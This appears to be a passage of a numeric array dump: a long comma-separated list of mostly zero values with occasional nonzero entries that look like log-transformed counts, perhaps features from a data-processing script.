0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 3.4011973816621555, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 2.6390573296152584, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 4.330733340286331, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 2.302585092994046, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 2.0794415416798357, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.833213344056216, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 2.772588722239781, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0,\n 0, 2.302585092994046, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 5.723585101952381, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.6390573296152584, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 11.069054569245793, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.3862943611198906, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 5.03709614637473, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 2.772588722239781, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 3.58351893845611, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0, 0.0, 0.0, 2.302585092994046, 0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0,\n 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.961361141082371, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0,\n 0.0, 0.0, 3.2188758248682006, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6109179126442243, 0, 0.0, 0.0, 0.0,\n 3.931825632724326, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0.0, 0.0, 4.189654742026425, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 1.0986122886681098, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 4.718498871295094, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0, 2.6390573296152584, 0.0, 0.0, 0, 0, 0.0, 0, \n 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, \n 3.4825185607408002, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0, 0, 0.0, 0.0, 0.0,\n 2.302585092994046, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 5.723585101952381, 0.0, 0.0, 0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 2.4849066497880004, 0, 4.007333185232471, 0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 16.237278281910243, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, \n 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0, 0.0, 0.0, 0.0, 0.0, \n 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, \n 0.0, 0, 4.330733340286331, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.7412592803704001, 0.0, 0.0, 0.0, 0.0, 0.0,\n 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 1.9459101490553132, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, \n 0.0, 1.3862943611198906, 0, 3.8005740880419454, 0.0, 0, 0.0, \n 2.833213344056216, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0,\n 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, \n 7.454719949364001, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 0.0,\n 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 2.70805020110221, \n 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0,\n 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, \n 5.723585101952381, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0,\n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0.0, 2.1972245773362196, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, \n 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.302585092994046, \n 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, \n 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0.0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, \n 0.0, 11.484086901809196, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 3.295836866004329, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0,\n 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0,\n 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 